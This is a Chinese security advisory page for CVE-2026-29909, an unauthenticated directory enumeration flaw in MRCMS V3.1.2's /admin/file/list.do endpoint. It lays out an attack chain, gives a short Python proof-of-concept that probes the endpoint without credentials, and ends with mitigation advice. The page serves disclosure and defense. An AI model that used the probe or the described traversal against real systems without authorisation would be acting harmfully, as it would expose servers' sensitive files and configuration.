IPBUF安全漏洞报告
English
CVE-2026-29909 CVSS 5.3 中危

CVE-2026-29909 MRCMS未认证目录枚举漏洞

披露日期: 2026-03-30

漏洞信息

漏洞编号
CVE-2026-29909
漏洞类型
目录枚举 / 信息泄露
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
MRCMS

相关标签

目录枚举信息泄露未授权访问MRCMSCVE-2026-29909

漏洞概述

MRCMS V3.1.2版本文件管理模块存在未认证目录枚举漏洞。由于`/admin/file/list.do`接口未实施有效的身份验证控制,且缺乏严格的输入验证机制,远程攻击者可以在无需任何用户凭证的情况下访问该端点。利用此漏洞,攻击者能够枚举服务器上的目录内容,进而获取敏感文件、配置信息或源代码,对系统安全性构成威胁。

技术细节

漏洞位于MRCMS V3.1.2的文件管理模块中,具体涉及`/admin/file/list.do`端点。该接口设计用于列出服务器文件,但开发人员未在此处添加身份验证检查,导致其直接暴露在公网。攻击原理在于后端收到请求后直接处理路径参数并返回目录列表,未验证请求来源的合法性。利用方式非常简单,攻击者只需向目标服务器发送GET请求,并附带特定的目录参数,即可绕过登录界面。由于未对目录跳转进行过滤,攻击者可能遍历Web根目录之外的其他路径,导致系统敏感信息全面泄露。

攻击链分析

STEP 1
信息收集
攻击者识别目标系统运行的是MRCMS V3.1.2,并确定其Web服务端口对外开放。
STEP 2
漏洞探测
攻击者构造HTTP GET请求发送至`/admin/file/list.do`,无需携带任何认证Cookie或Token。
STEP 3
目录遍历
服务器响应请求并返回指定目录的文件列表。攻击者通过修改请求参数遍历不同敏感目录。
STEP 4
信息获取
攻击者分析返回结果,获取敏感配置文件、数据库备份文件或源代码路径。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def check_vulnerability(target_url): """ Checks for CVE-2026-29909 directory enumeration vulnerability. """ # The vulnerable endpoint identified in the CVE description endpoint = "/admin/file/list.do" full_url = f"{target_url}{endpoint}" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } try: # Sending request without authentication cookies response = requests.get(full_url, headers=headers, timeout=10) if response.status_code == 200: print(f"[+] Potential vulnerability detected at {full_url}") print(f"[+] Response content (first 200 chars): {response.text[:200]}") else: print(f"[-] Endpoint returned status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[!] Error connecting to target: {e}") # Usage example # check_vulnerability("http://127.0.0.1:8080")

影响范围

MRCMS V3.1.2

防御指南

临时缓解措施
建议立即在防火墙或WAF层面对`/admin/file/list.do`路径实施IP白名单访问控制,阻断外部未授权访问。临时可修改后端代码逻辑,添加Session/Token校验,确保只有通过身份验证的管理员用户才能调用文件列表接口。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表